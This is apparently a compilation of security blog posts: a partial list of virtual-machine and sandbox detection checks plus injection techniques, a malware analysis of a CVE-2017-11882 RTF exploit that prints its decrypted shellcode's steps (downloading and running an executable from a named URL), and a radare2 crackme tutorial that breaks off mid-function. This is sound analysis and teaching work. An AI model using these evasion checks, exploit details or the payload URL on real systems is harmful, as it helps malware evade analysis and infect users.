    • «system32\drivers\VBoxSF.sys»
    • «system32\drivers\VBoxVideo.sys»
    • «system32\vboxdisp.dll»
    • «system32\vboxhook.dll»
    • «system32\vboxmrxnp.dll»
    • «system32\vboxogl.dll»
    • «system32\vboxoglarrayspu.dll»
    • «system32\vboxoglcrutil.dll»
    • «system32\vboxoglerrorspu.dll»
    • «system32\vboxoglfeedbackspu.dll»
    • «system32\vboxoglpackspu.dll»
    • «system32\vboxoglpassthroughspu.dll»
    • «system32\vboxservice.exe»
    • «system32\vboxtray.exe»
    • «system32\VBoxControl.exe»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vm3dmp.sys»
    • «system32\drivers\vmci.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vmmemctl.sys»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmrawdsk.sys»
    • «system32\drivers\vmusbmouse.sys»
  • Directories artifacts
    • «%PROGRAMFILES%\oracle\virtualbox guest additions\»
    • «%PROGRAMFILES%\VMWare\»
  • Memory artifacts
    • Interrupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • «\x08\x00\x27» (VBOX)
    • «\x00\x05\x69» (VMWARE)
    • «\x00\x0C\x29» (VMWARE)
    • «\x00\x1C\x14» (VMWARE)
    • «\x00\x50\x56» (VMWARE)
    • «\x00\x1C\x42» (Parallels)
    • «\x00\x16\x3E» (Xen)
  • Virtual devices
    • «\\.\VBoxMiniRdrDN»
    • «\\.\VBoxGuest»
    • «\\.\pipe\VBoxMiniRdDN»
    • «\\.\VBoxTrayIPC»
    • «\\.\pipe\VBoxTrayIPC»
    • «\\.\HGFS»
    • «\\.\vmci»
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • System Firmware Tables
    • SMBIOS string checks (VirtualBox)
    • SMBIOS string checks (VMWare)
    • SMBIOS string checks (Qemu)
    • ACPI string checks (VirtualBox)
    • ACPI string checks (VMWare)
    • ACPI string checks (Qemu)
  • Driver Services
    • VirtualBox
    • VMWare
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe (VMWARE)
    • vmwaretray.exe (VMWARE)
    • vmwareuser (VMWARE)
    • VGAuthService.exe (VMWARE)
    • vmacthlp.exe (VMWARE)
    • vmsrvc.exe (VirtualPC)
    • vmusrvc.exe (VirtualPC)
    • prl_cc.exe (Parallels)
    • prl_tools.exe (Parallels)
    • xenservice.exe (Citrix Xen)
    • qemu-ga.exe (QEMU)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (GENERIC)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
    • SELECT * FROM Win32_ComputerSystem (Model and Manufacturer) (GENERIC)
    • SELECT * FROM MSAcpi_ThermalZoneTemperature (CurrentTemperature) (GENERIC)
  • DLL Exports and Loaded DLLs
    • avghookx.dll (AVG)
    • avghooka.dll (AVG)
    • snxhk.dll (Avast)
    • kernel32.dll!wine_get_unix_file_name (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)
  • CPU
    • Hypervisor presence using (EAX=0x1)
    • Hypervisor vendor using (EAX=0x40000000)
      • «KVMKVMKVM\0\0\0» (KVM)
      • «Microsoft Hv» (Microsoft Hyper-V or Windows Virtual PC)
      • «VMwareVMware» (VMware)
      • «XenVMMXenVMM» (Xen)
      • «prl hyperv  » (Parallels)
      • «VBoxVBoxVBox» (VirtualBox)
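
The MAC address entries in the list above boil down to comparing the first three bytes of an adapter address (the vendor prefix) against known values. A minimal sketch in Python follows; al-khaser itself is not written in Python, and the names VM_MAC_PREFIXES and vendor_from_mac are chosen for this example only. The prefixes and vendor labels are taken from the list.

```python
VM_MAC_PREFIXES = {
    bytes.fromhex("080027"): "VBOX",
    bytes.fromhex("000569"): "VMWARE",
    bytes.fromhex("000C29"): "VMWARE",
    bytes.fromhex("001C14"): "VMWARE",
    bytes.fromhex("005056"): "VMWARE",
    bytes.fromhex("001C42"): "Parallels",
    bytes.fromhex("00163E"): "Xen",
}


def vendor_from_mac(mac):
    """Map a MAC address string to a VM vendor label, or None if no prefix matches."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("expected a 48-bit MAC address")
    return VM_MAC_PREFIXES.get(raw[:3])
```

A sandbox operator can use the same table the other way around: any adapter for which vendor_from_mac returns a label will be flagged by this class of checks unless its address is changed.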


  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Macro malware attacks

  • Document_Close / Auto_Close.
  • Application.RecentFiles.Count

Code/DLL Injections techniques

  • CreateRemoteThread
  • SetWindowsHookEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)



CVE-2017-11882 RTF: Full description

Two weeks ago, a malicious MS Word document was blocked by a sandbox (SHA-256: 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7). The sample looked interesting because, at that time, it had a limited detection rate on VirusTotal. Both VirusTotal and Any.Run identified the sample as CVE-2017-11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is quite a complex format by itself. On top of that, adversaries add obfuscation layers to prevent both analysts and analysis tools from detecting the malicious objects.

RTF Hide & Seek

Firing up oletools/rtfobj and Didier’s rtfdump to look for OLE objects did not yield anything useful.


No OLE objects detected by rtfdump

You can find a list about RTF obfuscation in the links below:

Unfortunately, those didn’t help us find an OLE object, so we simply searched for “d0cf” (the start of the OLE Compound File header signature), and one instance came up.
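
The manual search can be sketched in a few lines of Python. This is only an illustration, assuming the object data is hex-encoded in the RTF and interrupted by nothing worse than whitespace; the function name find_ole_signature and the sample fragment are hypothetical. It looks for the first four bytes of the OLE Compound File signature (D0 CF 11 E0) rather than just “d0cf”, to reduce false hits.

```python
import re


def find_ole_signature(rtf_text, needle="d0cf11e0"):
    """Return positions of the hex-encoded signature after whitespace removal."""
    # Obfuscated RTFs often split hex data with spaces and line breaks,
    # so drop all whitespace and normalise case before searching.
    cleaned = re.sub(r"\s+", "", rtf_text).lower()
    return [match.start() for match in re.finditer(re.escape(needle), cleaned)]


# Hypothetical RTF fragment: the signature is split across a line break.
sample = "{\\rtf1{\\object\\objemb{\\*\\objdata 01050000 D0CF\r\n11E0 A1B11AE1}}}"
hits = find_ole_signature(sample)
print(hits)
```

Real-world samples use heavier obfuscation (nested groups, control words inside the hex data), which this sketch does not handle.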

One OLE object instance identified

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02-0000-0000-c000-000000000046”, which indicates that it is related to Equation Editor and thus to the exploit itself. Additionally, one OLE Native Stream was identified (instead of an Equation Native stream).

CLSID related to Equation Editor
OLE Native Stream

How is the OLE Native Stream related? Cofense has posted a relevant article.

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field

Return to stack

The native stream is 0x795 (1941) bytes long. After that size field the actual content follows. One can guess that the next 4 bytes, starting from 02 AB 01 E7, are related to the Equation Editor MTEF header (given that no Equation Native stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (or does it?). In addition, there are two extra bytes (0xA, 0x1) which do not map onto the MTEF specification. If anyone knows how to interpret those bytes, please enlighten me.
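
Reading the size field can be sketched as follows, assuming the 4-byte NativeDataSize is stored little-endian at the very start of the stream. The function name split_ole_native_stream and the zero-padded sample stream are hypothetical; only the size 0x795 and the four leading data bytes come from the sample.

```python
import struct


def split_ole_native_stream(stream):
    """Split an OLENativeStream into (NativeDataSize, NativeData)."""
    if len(stream) < 4:
        raise ValueError("stream too short for the NativeDataSize field")
    # NativeDataSize: 4-byte little-endian length of the data that follows.
    (native_size,) = struct.unpack_from("<I", stream, 0)
    return native_size, stream[4:4 + native_size]


# Hypothetical stream: the size seen in the sample, then the four bytes quoted
# above, padded with zeroes up to the declared length.
payload = bytes.fromhex("02ab01e7").ljust(0x795, b"\x00")
stream = struct.pack("<I", 0x795) + payload
size, data = split_ole_native_stream(stream)
print(hex(size), data[:4].hex())
```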

Shellcode map

The most important part is the Font record, which has an ID of 0x8 and two one-byte identifiers, one for the typeface number and one for the style (0x9D and 0x7C respectively). The actual font name follows this byte sequence. The font name is stored in a 40-byte buffer; 8 more bytes are needed to overwrite the return address, which in our case is set to 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe.

It is well known that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, execution returns to our shellcode. Let’s fire up WinDbg.

Windbg return to stack

Prior to the ret instruction, the top element of the stack is the address of our shellcode (0x0018f354). After the ret instruction, this value will be popped into eip. We can see in the disassembly window that we have a very clean shellcode.

Analyzing the shellcode

In order to analyze the shellcode, I used shellcode2exe and fired up IDA. The first call goes through 0x004667b0, which is the import address of the GlobalLock function in EQNEDT32.exe and locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in an xor decryption loop. The decryption starts at offset 0x3FE and covers 0x389 bytes. To help with the decryption, a small IDAPython script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in the IDA console.

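import struct

# Runs inside IDA: Byte() and PatchByte() come from IDA's legacy idc API.
def run():
    start_pos = 0x4013fe  # address of the first encrypted byte
    length = 0x389        # size of the encrypted region
    key = 0
    for index in range(start_pos, start_pos + length, 4):
        # Advance the 32-bit key: key = key * 0x22A76047 + 0x2698B12D (mod 2**32)
        key = (key * 0x22A76047 + 0x2698B12D) & 0xFFFFFFFF
        key_bytes = bytearray(struct.pack('<I', key))
        for i in range(4):
            # XOR each byte with the matching little-endian key byte
            PatchByte(index + i, key_bytes[i] ^ Byte(index + i))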

After running the script, a URL appeared, so the decryption evidently worked.

Bytes before and after the decryption
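
For readers without IDA, the same keystream can be applied to a plain bytes buffer. This is a minimal sketch under the assumption that the buffer starts exactly at the first encrypted byte; the function name xor_decrypt is made up for illustration, while the two constants are the ones used in the script above.

```python
import struct


def xor_decrypt(data, mul=0x22A76047, add=0x2698B12D):
    """XOR data with the 32-bit keystream key = key * mul + add (mod 2**32)."""
    out = bytearray(data)
    key = 0
    for offset in range(0, len(out), 4):
        key = (key * mul + add) & 0xFFFFFFFF
        # The key is consumed byte by byte in little-endian order.
        for i, key_byte in enumerate(struct.pack("<I", key)):
            if offset + i < len(out):
                out[offset + i] ^= key_byte
    return bytes(out)


# XOR is its own inverse, so applying the function twice restores the input.
blob = b"example shellcode bytes"
print(xor_decrypt(xor_decrypt(blob)) == blob)
```

Unlike the IDA script, this version stops at the end of the buffer instead of always patching four bytes per round.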

In the decryption loop there is a call to sub_40147e, which was meaningless before the decryption, as the jmp destination was out of range.

Before the decryption

However, the same function looks totally different after the decryption. You can observe a lot of dynamic call instructions, which are most likely function pointers resolved by GetProcAddress.

After the decryption

To keep this post short, and being too lazy to continue the static analysis, I brought WinDbg onto the scene. What the shellcode does can be summarized in the following steps:

  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess

That’s all folks! This post and any following ones are simply a notepad documenting some basic analysis steps. Any comments or corrections are more than welcome.

In the above, we presented an analysis of a malicious RTF detected by a sandbox. The RTF was exploiting CVE-2017-11882. We analyzed the RTF, then extracted and analyzed the shellcode. The shellcode is a plain download & execute shellcode.

Reverse Engineering With Radare2 – Part 3

Sorry about the long delay between the previous post and this one, but I was very busy over the last few weeks.
(And the technology I wanted to show wasn’t completely implemented in radare2, which means that I had to implement it on my own 😉 ). In case you’re new to this series, you’ll find the previous posts here.

As you may already know, we’ll deal with the third challenge today. The purpose of this one is to introduce
some constructs which are often used in real programs.

Let’s start, like last time, by loading the binary into radare2 (r2 -AA ./challenge03).

As you may notice, the main function differs from the previous challenges:

[0x00400a04]> VV @ sym.main (nodes 4 edges 4 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
        |  0x400a04                                   |
        |   ;-- main:                                 |
        | (fcn) sym.main 115                          |
        | ; var int local_138h @ rbp-0x138            |
        | ; var int local_130h @ rbp-0x130            |
        | ; var int local_124h @ rbp-0x124            |
        | ; var int local_120h @ rbp-0x120            |
        | ; var int local_18h @ rbp-0x18              |
        | ; var int local_10h @ rbp-0x10              |
        | push rbp                                    |
        | mov rbp, rsp                                |
        | sub rsp, 0x140                              |
        | mov dword [rbp - local_124h], edi           |
        | mov qword [rbp - local_130h], rsi           |
        | mov qword [rbp - local_138h], rdx           |
        | mov eax, 0                                  |
        | call sym.banner ;[a]                        |
        | mov dword [rbp - local_120h], 0             |
        | mov qword [rbp - local_18h], obj.passwords  |
        | mov qword [rbp - local_10h], obj.passwords  |
        | lea rax, [rbp - local_120h]                 |
        | mov rdi, rax                                |
        | call sym.checkPassword ;[b]                 |
        | test al, al                                 |
        | je 0x400a66 ;[c]                            |
              t f
      .-------' '-----------------------.
      |                                 |
      |                                 |
=-------------------------=     =---------------------------------=
|  0x400a66               |     |  0x400a5a                       |
| mov edi, str.Wrong_     |     | mov edi, str.Password_accepted_ |
| call sym.imp.puts ;[d]  |     | call sym.imp.puts ;[d]          |
=-------------------------=     | jmp 0x400a70 ;[e]               |
    v                           =---------------------------------=
    |                               v
                    |  0x400a70          |
                    | mov eax, 0         |
                    | leave              |
                    | ret                |

For comparison, this is the main function of the previous challenge:


[0x004008e3]> VV @ sym.main (nodes 4 edges 4 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
            |  0x4008e3                          |
            |   ;-- main:                        |
            | (fcn) sym.main 133                 |
            |   sym.main ();                     |
            | ; var int local_118h @ rbp-0x118   |
            | ; var int local_110h @ rbp-0x110   |
            | ; var int local_104h @ rbp-0x104   |
            | ; var int local_100h @ rbp-0x100   |
            | ; var int local_1h @ rbp-0x1       |
            | push rbp                           |
            | mov rbp, rsp                       |
            | sub rsp, 0x120                     |
            | mov dword [rbp - local_104h], edi  |
            | mov qword [rbp - local_110h], rsi  |
            | mov qword [rbp - local_118h], rdx  |
            | mov eax, 0                         |
            | call sym.banner ;[a]               |
            | mov edi, str.Enter_Password:       |
            | mov eax, 0                         |
            | call sym.imp.printf ;[b]           |
            | lea rax, [rbp - local_100h]        |
            | mov rsi, rax                       |
            | mov edi, str._255s                 |
            | mov eax, 0                         |
            | call sym.imp.__isoc99_scanf ;[c]   |
            | mov byte [rbp - local_1h], 0       |
            | lea rax, [rbp - local_100h]        |
            | mov rdi, rax                       |
            | call sym.checkPassword ;[d]        |
            | test al, al                        |
            | je 0x400957 ;[e]                   |
                  t f
      .-----------' '-------------------.
      |                                 |
      |                                 |
=-------------------------=     =---------------------------------=
|  0x400957               |     |  0x40094b                       |
| mov edi, str.Wrong_     |     | mov edi, str.Password_accepted_ |
| call sym.imp.puts ;[f]  |     | call sym.imp.puts ;[f]          |
=-------------------------=     | jmp 0x400961 ;[g]               |
    v                           =---------------------------------=
    |                               v
                    |  0x400961          |
                    | mov eax, 0         |
                    | leave              |
                    | ret                |

The second half of the function seems the same (pseudo):

int main(int argc, char **argv) {
    // ...
    if(checkPassword(...)) {
        puts("Password accepted!\n");
    } else {
        puts("Wrong!\n");
    }
    return 0;
}

Whilst the previous challenges read the user password via scanf, this time some local variables are set.
One of them is set to zero, the other two to an address flagged as obj.passwords. As this seems very promising,
we’ll look at what’s stored at this address (with px @ obj.passwords):

- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00601060  080b 4000 0000 0000 100b 4000 0000 0000  ..@.......@.....
0x00601070  180b 4000 0000 0000 200b 4000 0000 0000  ..@..... .@.....
0x00601080  280b 4000 0000 0000 0000 0000 0000 0000  (.@.............
0x00601090  4743 433a 2028 474e 5529 2036 2e31 2e31  GCC: (GNU) 6.1.1
0x006010a0  2032 3031 3630 3830 3200 0000 0000 0000   20160802.......
0x006010b0  0000 0000 0000 0000 0000 0000 0000 0000  ................
0x006010c0  0000 0000 0000 0000 0000 0000 0300 0100  ................
0x006010d0  3802 4000 0000 0000 0000 0000 0000 0000  8.@.............
0x006010e0  0000 0000 0300 0200 5402 4000 0000 0000  ........T.@.....
0x006010f0  0000 0000 0000 0000 0000 0000 0300 0300  ................
0x00601100  7402 4000 0000 0000 0000 0000 0000 0000  t.@.............
0x00601110  0000 0000 0300 0400 9802 4000 0000 0000  ..........@.....
0x00601120  0000 0000 0000 0000 0000 0000 0300 0500  ................
0x00601130  0803 4000 0000 0000 0000 0000 0000 0000  ..@.............
0x00601140  0000 0000 0300 0600 4805 4000 0000 0000  ........H.@.....
0x00601150  0000 0000 0000 0000 0000 0000 0300 0700  ................

Hm, this is obviously not a list of readable strings… But if we look closer,
we can see that the values at this address could themselves be addresses…
(the 2nd-7th, 10th-15th, 18th-23rd, … bytes are the same and fit into valid memory regions).
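
The suspicion can be checked by hand: reading each group of eight bytes from the dump as a little-endian 64-bit value should give plausible addresses. The following sketch does this for the first 48 bytes of the px output; the function name read_pointer_table is hypothetical.

```python
import struct

# First 48 bytes of the px dump at obj.passwords (0x00601060).
raw = bytes.fromhex(
    "080b400000000000" "100b400000000000"
    "180b400000000000" "200b400000000000"
    "280b400000000000" "0000000000000000"
)


def read_pointer_table(data):
    """Decode little-endian 64-bit values until a zero entry is reached."""
    pointers = []
    for (value,) in struct.iter_unpack("<Q", data):
        if value == 0:
            break
        pointers.append(value)
    return pointers


table = read_pointer_table(raw)
print([hex(pointer) for pointer in table])
```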

As this is a 64bit binary, we’ll do the hexdump again, but this time with quadwords (pxq):

0x00601060  0x0000000000400b08  0x0000000000400b10   ..@.......@.....
0x00601070  0x0000000000400b18  0x0000000000400b20   ..@..... .@.....
0x00601080  0x0000000000400b28  0x0000000000000000   (.@.............
0x00601090  0x4e4728203a434347  0x312e312e36202955   GCC: (GNU) 6.1.1
0x006010a0  0x3038303631303220  0x0000000000000032    20160802.......
0x006010b0  0x0000000000000000  0x0000000000000000   ................
0x006010c0  0x0000000000000000  0x0001000300000000   ................
0x006010d0  0x0000000000400238  0x0000000000000000   8.@.............
0x006010e0  0x0002000300000000  0x0000000000400254   ........T.@.....
0x006010f0  0x0000000000000000  0x0003000300000000   ................
0x00601100  0x0000000000400274  0x0000000000000000   t.@.............
0x00601110  0x0004000300000000  0x0000000000400298   ..........@.....
0x00601120  0x0000000000000000  0x0005000300000000   ................
0x00601130  0x0000000000400308  0x0000000000000000   ..@.............
0x00601140  0x0006000300000000  0x0000000000400548   ........H.@.....
0x00601150  0x0000000000000000  0x0007000300000000   ................

This looks far better… As we see, radare2 also shows the values in green this time, which is another hint in
the address direction. By using pxQ we can tell radare2 to print them one per line and additionally give some meta information about them:

0x00601060 0x0000000000400b08 str.shad7Pe
0x00601068 0x0000000000400b10 str.miTho7i
0x00601070 0x0000000000400b18 str.Wa3suac
0x00601078 0x0000000000400b20 str.ohGhah7
0x00601080 0x0000000000400b28 str.Aibah1a
0x00601088 0x0000000000000000 section.
0x00601090 0x4e4728203a434347 
0x00601098 0x312e312e36202955 
0x006010a0 0x3038303631303220 
0x006010a8 0x0000000000000032 section_end..comment+24
0x006010b0 0x0000000000000000 section.
0x006010b8 0x0000000000000000 section.
0x006010c0 0x0000000000000000 section.
0x006010c8 0x0001000300000000 
0x006010d0 0x0000000000400238 section..interp
0x006010d8 0x0000000000000000 section.
0x006010e0 0x0002000300000000 
0x006010e8 0x0000000000400254 section_end..interp
0x006010f0 0x0000000000000000 section.
0x006010f8 0x0003000300000000 
0x00601100 0x0000000000400274 section_end..note.ABI_tag
0x00601108 0x0000000000000000 section.
0x00601110 0x0004000300000000 
0x00601118 0x0000000000400298 section_end..note.gnu.build_id
0x00601120 0x0000000000000000 section.
0x00601128 0x0005000300000000 
0x00601130 0x0000000000400308 section..dynsym
0x00601138 0x0000000000000000 section.
0x00601140 0x0006000300000000 
0x00601148 0x0000000000400548 section_end..dynsym
0x00601150 0x0000000000000000 section.
0x00601158 0x0007000300000000 

If you want to have an even more annotated view, use pxr:

0x00601060  0x0000000000400b08   ..@..... (.rodata) str.shad7Pe R 0x65503764616873 (shad7Pe) --> ascii
0x00601068  0x0000000000400b10   ..@..... (.rodata) str.miTho7i R 0x69376f6854696d (miTho7i) --> ascii
0x00601070  0x0000000000400b18   ..@..... (.rodata) str.Wa3suac R 0x63617573336157 (Wa3suac) --> ascii
0x00601078  0x0000000000400b20    .@..... (.rodata) str.ohGhah7 R 0x3768616847686f (ohGhah7) --> ascii
0x00601080  0x0000000000400b28   (.@..... (.rodata) str.Aibah1a R 0x61316861626941 (Aibah1a) --> ascii
0x00601088  0x0000000000000000   ........ section_end.GNU_STACK
0x00601090  0x4e4728203a434347   GCC: (GN ascii
0x00601098  0x312e312e36202955   U) 6.1.1 ascii
0x006010a0  0x3038303631303220    2016080 ascii
0x006010a8  0x0000000000000032   2....... (.shstrtab) ascii
0x006010b0  0x0000000000000000   ........ section_end.GNU_STACK
0x006010b8  0x0000000000000000   ........ section_end.GNU_STACK
0x006010c0  0x0000000000000000   ........ section_end.GNU_STACK
0x006010c8  0x0001000300000000   ........
0x006010d0  0x0000000000400238   8.@..... (.interp) section.INTERP R 0x6c2f343662696c2f (/lib64/ld-linux-x86-64.so.2) --> ascii
0x006010d8  0x0000000000000000   ........ section_end.GNU_STACK
0x006010e0  0x0002000300000000   ........
0x006010e8  0x0000000000400254   T.@..... (.note.ABI_tag) section.NOTE R 0x1000000004
0x006010f0  0x0000000000000000   ........ section_end.GNU_STACK
0x006010f8  0x0003000300000000   ........
0x00601100  0x0000000000400274   t.@..... (.note.gnu.build_id) section..note.gnu.build_id R 0x1400000004
0x00601108  0x0000000000000000   ........ section_end.GNU_STACK
0x00601110  0x0004000300000000   ........
0x00601118  0x0000000000400298   ..@..... (.gnu.hash) section_end.NOTE R 0x800000003
0x00601120  0x0000000000000000   ........ section_end.GNU_STACK
0x00601128  0x0005000300000000   ........
0x00601130  0x0000000000400308   ..@..... (.dynsym) section..dynsym R 0x0 --> section_end.GNU_STACK
0x00601138  0x0000000000000000   ........ section_end.GNU_STACK
0x00601140  0x0006000300000000   ........
0x00601148  0x0000000000400548   H.@..... (.dynstr) section..dynstr R 0x6f732e6362696c00 --> ascii
0x00601150  0x0000000000000000   ........ section_end.GNU_STACK
0x00601158  0x0007000300000000   ........

So we know that the obj.passwords is an array of string pointers, suffixed with a null pointer. Let’s look again at
the main function. We see that this list is assigned to local variables (local_18h and local_10h), but it seems
that only a pointer to local_120h is passed as an argument to the checkPassword function (the lea rax, [rbp - local_120h] part).

Based on our current information the following stack layout is used:

rbp-0x120: 0000 0000
rbp-0x11c: ???? ????
rbp-0x018: &obj.passwords
rbp-0x010: &obj.passwords

This means that if you have a pointer to the local_120h variable, you’ll be able to read forwards up to the other
two variables. If we look into the checkPassword function, we’ll see that the address in the first argument is used
multiple times (stored in local_18h) and the value 0x110 is added to it. If we do the calculation (? -0x120 + 0x110),
we see that this matches the local_10h variable of the main function:

-16 0xfffffffffffffff0 01777777777777777777760 17179869184.0G fffff000:0ff0 -16 1111111111111111111111111111111111111111111111111111111111110000 -16.0 -16.000000f -16.000000

(-16 is the same as -0x10, or 0xfffffffffffffff0 as a quadword.) Such constructs are strong indicators of structures.
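
The same arithmetic can be reproduced outside radare2. This is a small sketch with made-up names (rbp_slot, LOCAL_120H): it adds a field offset to the rbp-relative position of local_120h and also prints the 64-bit two’s complement form, which is what the 0xfffffffffffffff0 value above represents.

```python
MASK64 = (1 << 64) - 1


def rbp_slot(base_offset, field_offset):
    """Offset from rbp reached by adding a field offset to a stack variable."""
    return base_offset + field_offset


LOCAL_120H = -0x120  # local_120h lives at rbp-0x120

for field in (0x108, 0x110):
    slot = rbp_slot(LOCAL_120H, field)
    # The masked value is the offset as an unsigned 64-bit quadword.
    print(f"+{field:#x} -> rbp{slot:+#x} (as quadword: {slot & MASK64:#018x})")
```

Offset 0x108 lands on local_18h and offset 0x110 on local_10h, the two variables that main initialises with obj.passwords.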

radare2 has some rudimentary support for structures (primarily for representing data in memory) and a generic type system.

Based on our current knowledge, the structure should be something like this:

struct Foo {
    int field0;
    char unknown[260];
    char** field108;
    char** field110;
};

If we place this definition in a header file, we can tell radare2 to parse it with the to command. To view all currently stored structures, you can use the ts command:


By using t Foo you can generate a formatting command for viewing data based on the parsed definitions. As you notice, this produces some errors:

Cannot resolve type 'type.char **'
Cannot resolve type 'type.char **'
pf d[260]z field0 unknown

This is because radare2 currently doesn’t have a definition for the type char **. We can either change the field types to void* or define the missing type. For learning purposes, we’ll define the missing type.

Internally, radare2 uses a database named sdb. This is more or less a key-value store with support for namespaces.

All types are defined inside the anal/types namespace. To interact with the database, you can use either the k command (complete database)
or the tk command (type namespace only). To define a new type, we’ll have to make it known to radare2. This is done by assigning the string type to the type identifier:

tk char **=type

In the next step we tell radare how this value should be printed:

tk type.char **=p

We’ve used the p format here, which means that this type represents a pointer. (You can see all possible formatting options by using pf??).

This time, the t Foo command succeeds:

pf d[260]zpp field0 unknown field108 field110

Note: If you are interested in how radare2 stores the information about this struct, run tk~Foo. The format for the fields is type,offset,arraysize.

Now that we have the structure defined, we can use it in the main function. To do this, we’ll set the type of the local_120h variable to this new type Foo:

afvt local_120h Foo

(afvt stands for analysis function variables type).

This time, the disassembly has some additional annotations:

            ;-- main:
/ (fcn) sym.main 115
|   sym.main ();
|           ; var int local_138h @ rbp-0x138
|           ; var int local_130h @ rbp-0x130
|           ; var int local_124h @ rbp-0x124
|           ; var Foo local_120h @ rbp-0x120
|           ; UNKNOWN XREF from 0x004004a8 (unk)
|           ; DATA XREF from 0x004007dd (entry0)
|           0x00400a04      55             push rbp
|           0x00400a05      4889e5         mov rbp, rsp
|           0x00400a08      4881ec400100.  sub rsp, 0x140
|           0x00400a0f      89bddcfeffff   mov dword [rbp - local_124h], edi
|           0x00400a15      4889b5d0feff.  mov qword [rbp - local_130h], rsi
|           0x00400a1c      488995c8feff.  mov qword [rbp - local_138h], rdx
|           0x00400a23      b800000000     mov eax, 0
|           0x00400a28      e889feffff     call sym.banner
|           0x00400a2d      c785e0feffff.  mov dword [rbp - local_120h.field0], 0
|           0x00400a37      48c745e86010.  mov qword [rbp - local_120h.field108], obj.passwords
|           0x00400a3f      48c745f06010.  mov qword [rbp - local_120h.field110], obj.passwords
|           0x00400a47      488d85e0feff.  lea rax, [rbp - local_120h.field0]
|           0x00400a4e      4889c7         mov rdi, rax
|           0x00400a51      e815ffffff     call sym.checkPassword
|           0x00400a56      84c0           test al, al
|       ,=< 0x00400a58      740c           je 0x400a66
|       |   0x00400a5a      bfe90b4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400be9
|       |   0x00400a5f      e81cfdffff     call sym.imp.puts
|      ,==< 0x00400a64      eb0a           jmp 0x400a70
|      |`-> 0x00400a66      bffc0b4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400bfc
|      |    0x00400a6b      e810fdffff     call sym.imp.puts
|      |    ; JMP XREF from 0x00400a64 (sym.main)
|      `--> 0x00400a70      b800000000     mov eax, 0
|           0x00400a75      c9             leave
\           0x00400a76      c3             ret

If your output is different from the one above (e.g. missing local_120h.field110), make sure that the offsets were correctly calculated in the database. You can change every entry with the tk command, e.g. tk struct.Foo.field110=char **,272,0.
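
If you are unsure which offsets the database should contain, they can be cross-checked outside radare2. The following sketch rebuilds the structure with Python’s ctypes, modelling both pointers as plain 64-bit integers (an assumption, chosen so the result does not depend on the machine running the script), and prints the offset of every field.

```python
import ctypes


class Foo(ctypes.Structure):
    # Pointers are modelled as fixed 64-bit integers so the layout matches the
    # 64-bit target regardless of the machine running this script.
    _fields_ = [
        ("field0", ctypes.c_int32),
        ("unknown", ctypes.c_char * 260),
        ("field108", ctypes.c_uint64),
        ("field110", ctypes.c_uint64),
    ]


offsets = {name: getattr(Foo, name).offset for name, _ in Foo._fields_}
print(offsets)
```

The values for field108 and field110 should come out as 264 (0x108) and 272 (0x110), matching the tk entry shown above.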

As we can see, the output now nicely aligns with the assignments. Another attempt to represent the asm code as C code
would now look like:

int main(int argc, char **argv) {
    struct Foo local_120h;
    banner();
    local_120h.field0 = 0;
    local_120h.field108 = obj.passwords;
    local_120h.field110 = obj.passwords;
    if(checkPassword(&local_120h)) {
        puts("Password accepted!\n");
    } else {
        puts("Wrong!\n");
    }
    return 0;
}

The next function (checkPassword) is (obviously) also different to the previous ones:

[0x0040096b]> VV @ sym.checkPassword (nodes 7 edges 8 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
                     |  0x40096b                                     |
